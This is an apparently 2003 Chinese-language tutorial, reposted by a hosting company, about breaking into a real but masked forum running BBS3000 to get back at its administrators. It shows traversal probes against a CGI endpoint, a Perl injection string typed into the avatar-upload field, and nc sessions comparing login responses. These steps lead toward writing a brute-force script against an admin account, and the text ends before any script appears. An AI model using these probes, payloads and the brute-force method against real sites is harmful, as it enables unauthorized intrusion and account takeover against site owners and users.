一、开篇
今天闲着无聊,到本地区的一个社区上转转,那些人污言秽语的,有个帖子还侵犯了一个朋友的版权,跟贴说了那人几句,管理员也不管,实在看不下去了,打算给管理员盆冷水清醒清醒。
二、准备/分析
安全第一,先开个HTTP代理,打开社区的登陆页面,看到上面显示的URL是:http://www.****bbs.com/login.cgi
打开页面的源代码,找到登陆的关键几句:
<form action="login.cgi" method="post">
<input type="hidden" name="menu" value="login">
<input type="hidden" name="id" value="">
用户名:<input size="25" name="username" class="i06">
密 码:<input type="password" size="25" value name="userpsd" class="i06">
</form>
所以,提交登陆信息的URL应该是http://wwww.****bbs.com/login.cgi?username=ID&userpsd=PWD&menu=login&id=
习惯先查看用户信息,因为一般情况下用户名和密码都是紧连着保存在一起的,在这里我们更容易接近我们想要的信息。提交如下URL查看silkroad用户信息:
http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad
返回正常用户信息
http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=./silkroad
同样返回正常用户信息,看来.和/已被过滤掉了
http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad�
提示此用户没有被注册 :(
扫描看看,有FTP弱口令~可惜是anonymous,价值不大。
回到CGI上,只在http://www.****bbs.com/rank.cgi这上面发现用的是Yuzi的BBS3000。下面也能够下载BBS3000分析源代码,但比较费时间,我们先到几处敏感的地方看看,
http://www.****bbs.com/photo.cgi能够上传头像。
由于头像的显示是
<img src=***></img>
关键就在***这里,即图片的连接。在要上传的头像的输入栏中填入
</img>qq~;open F,">the0crat.txt";<img src=>.gif
试试,提交,没有任何提示,程式也没对图片进行任何改变。
换个角度来看,既不分析源代码,也不入侵目标服务器,那么还是来试试探测探测社区管理员的密码,难说我今天运气比较好 :)
当然社区上的管理员也不会是白痴,不会设个空密码等您去玩。提到探测论坛ID的密码,大家首先想到的是什么?下载个又大又没趣的黑客软件来挂个字典?难道就没有点想要自己动手写一个脚本来破密码的冲动?嘿嘿。现在就教您自己动手一步一步来对密码进行探测 :)
密码探测的一般方法是:
①取得预进行猜测的密码列表
|
|
|
②向目标依次提交密码 <---------
| |
| |
| |
③根据目标的响应判断密码是否正确 |
| | |
| | |
| | |
密码正确 密码错误 |
| | |
| | |
| | |
返回给用户密码 Next-----------------
第三步要绕个圈子,其他的几步用程式就能很简单的实现。
所以先从第三步开始:
我不了解别的那些程式是怎么进行判断的,估计是先取得成功登陆和密码错误的两个页面的代码,然后对比他们的不同点,可能更有别的办法,可我还没想到~~~:)
所以,首先注册个ID,帐号asdfasdf,密码asdfasdf,根据前面取得的信息,此ID提交的URL为http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=asdfasdf&menu=login&id=,"username="这后面的是用户ID,"userpsd="这后面是用户密码,然后登出社区
现在用telnet去取得我们想要的信息:
F:/>nc -vv www.****bbs.com 80 <<<-----用nc连接目标WEB服务的端口,别说您不知道nc是什么,嘿嘿
Warning: inverse host lookup failed for ***.***.***.***: h_errno 11004: NO_DATA
www.****bbs.com [***.***.***.***] 80 (http) open
GET http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=error&menu=login&id= HTTP/1.1 <Enter>
<<<-------这里用到前面提到的提交用户登陆信息的URL,但用的是错误密码
host:iis-server <Enter><Enter>
HTTP/1.1 200 OK
Date: Mon, 18 Aug 2003 11:59:41 GMT
Server: Apache/1.3.26 (Unix) PHP/4.0.6
Transfer-Encoding: chunked
Content-Type: text/html
fe7 <<<------------注意这个
<html>
<head>
<meta http-equiv=Content-Type content=text/html; charset=gb2312>
<link REL="SHORTCUT ICON" href=http://www.****bbs.com/pic/ybb.ico>
......
这个是非成功登陆后返回的信息,再来:
F:/>nc -vv www.****bbs.com 80
Warning: inverse host lookup failed for ***.***.***.***: h_errno 11004: NO_DATA
www.****bbs.com [***.***.***.***] 80 (http) open
GET http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=asdfasdf&menu=login&id= HTTP/1.1
<<<-------这次用的是正确的密码
host:iis-server
HTTP/1.1 200 OK
Date: Mon, 18 Aug 2003 12:09:43 GMT
Server: Apache/1.3.26 (Unix) PHP/4.0.6
Transfer-Encoding: chunked
Content-Type: text/html
18d <<<------------注意这个
<html><head><meta http-equiv=Content-Type content=text/html; charset=gb2312>
<SCRIPT>
expireDate=new Date;
expireDate.setYear(expireDate.getYear() 1);
......
这个是成功登陆后返回的信息,返回的信息的第七行"fe7"和"18d"不同,我们就从这里下手。
现在到社区的管理团队上看看管理员的ID,其中一个管理员的ID是“秘密”。
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
